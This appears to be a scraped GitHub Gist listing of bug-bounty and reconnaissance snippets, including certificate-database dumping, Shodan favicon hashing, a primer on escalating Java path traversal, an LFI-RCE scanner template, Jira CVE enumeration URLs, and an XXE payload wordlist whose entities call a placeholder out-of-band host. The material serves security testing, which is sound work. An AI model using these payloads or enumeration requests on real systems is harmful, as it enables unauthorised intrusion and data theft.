Skip to content

Instantly share code, notes, and snippets.

View devanshbatham's full-sized avatar
Grepping Internet, One line at a time

Devansh Batham devanshbatham

Grepping Internet, One line at a time
View GitHub Profile
@denji
denji / http-benchmark.md
Last active October 13, 2024 00:43
HTTP(S) Benchmark Tools / Toolkit for testing/debugging HTTP(S) and restAPI (RESTful)
@chrisdlangton
chrisdlangton / dump_cert.sh
Created January 18, 2019 03:19
Script to dump the entire cert.sh database as CSV
#!/usr/bin/env bash
SCHEMA=public
DB=certwatch
HOST=crt.sh
PORT=5432
USER='guest --no-password'
DIR=$(pwd)
mkdir -p $DIR
@yehgdotnet
yehgdotnet / get-shodan-favicon-hash.py
Last active October 25, 2024 04:40
Get Shodan FAVICON Hash
# https://twitter.com/brsn76945860/status/1171233054951501824
pip install mmh3
-----------------------------
# python 2
import mmh3
import requests
response = requests.get('https://cybersecurity.wtf/favicon.ico')
favicon = response.content.encode('base64')
@harisec
harisec / exploit_path_traversals_in_Java_webapps.txt
Created April 27, 2020 10:24
quick primer on how to exploit path traversals in Java web apps (i.e. you can read WEB-INF/web.xml)
so, you can read WEB-INF/web.xml. how can you escalate this issue?
[step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml.
use a specialized wordlist such as the following (from Sergey Bobrov/BlackFan):
https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt
with time you can build your own wordlist adding files you've discovered over time.
use Burp Intruder for this, it's perfect for this job.
sort Intruder results by status code so you can see instantly which files were found.
@akhil-reni
akhil-reni / README.md
Created May 31, 2020 14:10
Recon using spyse

Search ASN number using organization name

curl -X GET "https://api.spyse.com/v2/data/as/search?limit=100&search_params=%7B%22as_org%22%3A%5B%7B%22operator%22%3A%22contains%22%2C%22value%22%3A%22Oath%20Holdings%20Inc.%22%7D%5D%7D" -H "accept: application/json" -H "Authorization: Bearer token"

Fetch domains using ASN

curl -X GET "https://api.spyse.com/v2/data/as/domain?limit=100&asn=10310" -H "accept: application/json" -H "Authorization: Bearer token"
@Sturtuk
Sturtuk / extract_mapjs.php
Created June 24, 2020 02:44
Extract source code & directories from the javascript .map files
<?php
/**
* Created by PhpStorm.
* User: edwinsturt
* Date: 2020-06-24
* Time: 00:45
*/
$file = 'main.ff0058ad.js.map';
@0x240x23elu
0x240x23elu / rce.yaml
Last active December 12, 2023 02:14
LFI-RCE
id: LFI-RCE
info:
name: LFI Detection
author: 0x240x23elu & payloadallthings
severity: High
requests:
- method: GET
@m4ll0k
m4ll0k / chaos.py
Last active September 5, 2022 05:44
# github.com/m4ll0k (@m4ll0k2)
'''
Steps:
0. Make dir like chaos 'mkdir chaos'
1. Download this script in choas dir 'wget https://..'
2. Now: 'python3 choas.py |sort -u > dns_wordlist.txt'
'''
@honoki
honoki / xxe-payloads.txt
Last active November 11, 2024 17:01
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@0x240x23elu
0x240x23elu / Jira bug-exploit
Last active March 12, 2024 09:45
Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230
cve-2019-8449
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
https://jira.atlassian.com/browse/JRASERVER-69796
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================